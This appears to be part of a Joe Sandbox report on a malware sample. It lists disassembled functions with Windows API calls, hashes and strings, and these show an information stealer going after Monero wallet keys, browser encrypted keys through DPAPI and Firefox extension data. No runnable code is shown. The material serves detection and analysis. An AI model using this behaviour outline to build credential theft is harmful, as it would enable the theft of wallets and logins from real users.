                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 6da040b8e0ea3ffab90d414b8d8e11c5443208cfd3e7b3710ac10531374cb96f
                              • Instruction ID: 032b9e2de972a8855184f58acf3f0caaa15f65ddececdb108b4c9101cd616236
                              • Opcode Fuzzy Hash: 6da040b8e0ea3ffab90d414b8d8e11c5443208cfd3e7b3710ac10531374cb96f
                              • Instruction Fuzzy Hash: 9191FB7691010C9BCB44FBA1DC96FEE7339AF1430CF50456EF506A6091EE386A19CB7A
                              Function 004BD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004C8B60: GetSystemTime.KERNEL32(004D0E1A,0118CF88,004D05AE,?,?,004B13F9,?,0000001A,004D0E1A,00000000,?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004C8B86
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004BD801
                              • lstrlen.KERNEL32(00000000), ref: 004BD99F
                              • lstrlen.KERNEL32(00000000), ref: 004BD9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 004BDA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 27132db4a63115c4d8a8910bdc794db2d080b93eb3172ce373ba30d8ddf2c15b
                              • Instruction ID: b9ee0bee31caca892905ebe6e3c3169352fe86ceb54c7294ea1812ed1085dcb5
                              • Opcode Fuzzy Hash: 27132db4a63115c4d8a8910bdc794db2d080b93eb3172ce373ba30d8ddf2c15b
                              • Instruction Fuzzy Hash: 9081F0B591010C9BCB44FBA5DC96FEE7339AF1430CF50452EF406A6191EE386A19CB7A
                              Function 004BF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004B99EC
                                • Part of subcall function 004B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004B9A11
                                • Part of subcall function 004B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 004B9A31
                                • Part of subcall function 004B99C0: ReadFile.KERNEL32(000000FF,?,00000000,004B148F,00000000), ref: 004B9A5A
                                • Part of subcall function 004B99C0: LocalFree.KERNEL32(004B148F), ref: 004B9A90
                                • Part of subcall function 004B99C0: CloseHandle.KERNEL32(000000FF), ref: 004B9A9A
                                • Part of subcall function 004C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004C8E52
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,004D1580,004D0D92), ref: 004BF54C
                              • lstrlen.KERNEL32(00000000), ref: 004BF56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: d29869b6f3f2e8f6535e8a4a5b57c98ebe09dfb9a03d908e64e1e3ab2badd27e
                              • Instruction ID: f18929ae95a9b73cb053a2f1b05322fcb195a20e0a3c563613464f94cacd91a5
                              • Opcode Fuzzy Hash: d29869b6f3f2e8f6535e8a4a5b57c98ebe09dfb9a03d908e64e1e3ab2badd27e
                              • Instruction Fuzzy Hash: 0B512579D0010CABDB44FBA1DC56EED7338AF54308F50852EF81657191EE386A19CBBA
                              Function 004C3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 0e60001746c051267f3df6e38b9b61f10bdc55e968c979cdbbb8bf69a86cc8c4
                              • Instruction ID: ac3db7e61b3b3e46bc27b7c62701095c4b3e28b92fd7ee085af51cd5a306639d
                              • Opcode Fuzzy Hash: 0e60001746c051267f3df6e38b9b61f10bdc55e968c979cdbbb8bf69a86cc8c4
                              • Instruction Fuzzy Hash: 17416DB9D10108ABCB44EFA5D855FFEB774AB44708F10801EE01667290DB79AA05CFAA
                              Function 004B9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004B99EC
                                • Part of subcall function 004B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004B9A11
                                • Part of subcall function 004B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 004B9A31
                                • Part of subcall function 004B99C0: ReadFile.KERNEL32(000000FF,?,00000000,004B148F,00000000), ref: 004B9A5A
                                • Part of subcall function 004B99C0: LocalFree.KERNEL32(004B148F), ref: 004B9A90
                                • Part of subcall function 004B99C0: CloseHandle.KERNEL32(000000FF), ref: 004B9A9A
                                • Part of subcall function 004C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004C8E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004B9D39
                                • Part of subcall function 004B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NK,00000000,00000000), ref: 004B9AEF
                                • Part of subcall function 004B9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,004B4EEE,00000000,?), ref: 004B9B01
                                • Part of subcall function 004B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NK,00000000,00000000), ref: 004B9B2A
                                • Part of subcall function 004B9AC0: LocalFree.KERNEL32(?,?,?,?,004B4EEE,00000000,?), ref: 004B9B3F
                                • Part of subcall function 004B9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004B9B84
                                • Part of subcall function 004B9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 004B9BA3
                                • Part of subcall function 004B9B60: LocalFree.KERNEL32(?), ref: 004B9BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 244a4f45811bcb02251bf294b9caef34fcdb55c2d0c8dc08558e94ee39199981
                              • Instruction ID: cbe72a6ee86e1e50a80e546349654eaeb8073531e49933cf3d6ab25239b73038
                              • Opcode Fuzzy Hash: 244a4f45811bcb02251bf294b9caef34fcdb55c2d0c8dc08558e94ee39199981
                              • Instruction Fuzzy Hash: 37313EB5D10209ABCF14DBE5DC85EEFB7B8AB48304F14451EEA05A7241E7399E04CBB9
                              Function 004C94D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 004C94EB
                                • Part of subcall function 004C8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004C951E,00000000), ref: 004C8D5B
                                • Part of subcall function 004C8D50: RtlAllocateHeap.NTDLL(00000000), ref: 004C8D62
                                • Part of subcall function 004C8D50: wsprintfW.USER32 ref: 004C8D78
                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004C95AB
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 004C95C9
                              • CloseHandle.KERNEL32(00000000), ref: 004C95D6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                              • String ID:
                              • API String ID: 3729781310-0
                              • Opcode ID: 0297132f2a9a888e225631d948a297c3799ed3e882267149e08ac3bb999acee7
                              • Instruction ID: 8117c7831172186bb640aebfa6279d4c19c2c45d4f2cf570b1eacc61adbb8dbf
                              • Opcode Fuzzy Hash: 0297132f2a9a888e225631d948a297c3799ed3e882267149e08ac3bb999acee7
                              • Instruction Fuzzy Hash: 53311DB5E00208AFDB14DFD0CD49FEDB775EB44304F10445EE50AAA284DB78AE45CB56
                              Function 004C8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004D05B7), ref: 004C86CA
                              • Process32First.KERNEL32(?,00000128), ref: 004C86DE
                              • Process32Next.KERNEL32(?,00000128), ref: 004C86F3
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              • CloseHandle.KERNEL32(?), ref: 004C8761
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: ac5c144bf0ec19ded660f50d59ccff47644a15e6bb926a21e8fc36c489f9cd9a
                              • Instruction ID: 7a9c99ded9585e7f85f6f1d66761229bef2c0fb3e77b1812298cd7871f9859a7
                              • Opcode Fuzzy Hash: ac5c144bf0ec19ded660f50d59ccff47644a15e6bb926a21e8fc36c489f9cd9a
                              • Instruction Fuzzy Hash: FC318FB5901118ABCB64EF91DC45FEEB778FF04704F1041AEE109A2190DB386E45CFA5
                              Function 004C7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,004D0E00,00000000,?), ref: 004C79B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C79B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,004D0E00,00000000,?), ref: 004C79C4
                              • wsprintfA.USER32 ref: 004C79F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 0d210b1b4c9358d75282cdfb18e3a8862855483a3a7b29e54d3370d4c9255257
                              • Instruction ID: f3891d47cae929dfab57f8d02626bfa2f3afcf9dc7eafa889492d5b984ff0066
                              • Opcode Fuzzy Hash: 0d210b1b4c9358d75282cdfb18e3a8862855483a3a7b29e54d3370d4c9255257
                              • Instruction Fuzzy Hash: 1F1127B2904118ABCB14DFC9DD45FBEB7F9FB4CB11F10421AF605A2280E2795940CBB5
                              Function 004CC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 004CC74E
                                • Part of subcall function 004CBF9F: __amsg_exit.LIBCMT ref: 004CBFAF
                              • __getptd.LIBCMT ref: 004CC765
                              • __amsg_exit.LIBCMT ref: 004CC773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 004CC797
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 265ba36ce5f33fa79e937a878f5fb905af5a5f3b95cd4b0a0595d815829886ae
                              • Instruction ID: 59f0a0298f3fd1f49f00987c91837a0954e236104badc61d75fb21aaee177707
                              • Opcode Fuzzy Hash: 265ba36ce5f33fa79e937a878f5fb905af5a5f3b95cd4b0a0595d815829886ae
                              • Instruction Fuzzy Hash: 0DF0963A9063059BD7A1BB795847F5E33A0DF0071CF21415FF408E62D2CB6C59419E9E
                              Function 004C4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004C8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 004C4F7A
                              • lstrcat.KERNEL32(?,004D1070), ref: 004C4F97
                              • lstrcat.KERNEL32(?,011887F8), ref: 004C4FAB
                              • lstrcat.KERNEL32(?,004D1074), ref: 004C4FBD
                                • Part of subcall function 004C4910: wsprintfA.USER32 ref: 004C492C
                                • Part of subcall function 004C4910: FindFirstFileA.KERNEL32(?,?), ref: 004C4943
                                • Part of subcall function 004C4910: StrCmpCA.SHLWAPI(?,004D0FDC), ref: 004C4971
                                • Part of subcall function 004C4910: StrCmpCA.SHLWAPI(?,004D0FE0), ref: 004C4987
                                • Part of subcall function 004C4910: FindNextFileA.KERNEL32(000000FF,?), ref: 004C4B7D
                                • Part of subcall function 004C4910: FindClose.KERNEL32(000000FF), ref: 004C4B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
